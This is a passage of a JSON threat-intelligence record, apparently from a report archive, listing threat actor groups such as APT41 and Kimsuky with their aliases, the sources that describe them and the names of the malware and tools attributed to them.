"UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], "source_name": "ETDA:Kimsuky", "tools": [ "AngryRebel", "AppleSeed", "BITTERSWEET", "BabyShark", "BoBoStealer", "CSPY Downloader", "Farfli", "FlowerPower", "Gh0st RAT", "Ghost RAT", "Gold Dragon", "GoldDragon", "GoldStamp", "JamBog", "KGH Spyware Suite", "KGH_SPY", "KPortScan", "KimJongRAT", "Kimsuky", "LATEOP", "LOLBAS", "LOLBins", "Living off the Land", "Lovexxx", "MailPassView", "Mechanical", "Mimikatz", "MoonPeak", "Moudour", "MyDogs", "Mydoor", "Network Password Recovery", "PCRat", "ProcDump", "PsExec", "ReconShark", "Remote Desktop PassView", "SHARPEXT", "SWEETDROP", "SmallTiger", "SniffPass", "TODDLERSHARK", "TRANSLATEXT", "Troll Stealer", "TrollAgent", "VENOMBITE", "WebBrowserPassView", "xRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434293, "ts_updated_at": 1775792260, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/e118eb30b00875b6add60fa0a135488113bfc367.pdf", "text": "https://archive.orkl.eu/e118eb30b00875b6add60fa0a135488113bfc367.txt", "img": "https://archive.orkl.eu/e118eb30b00875b6add60fa0a135488113bfc367.jpg" } }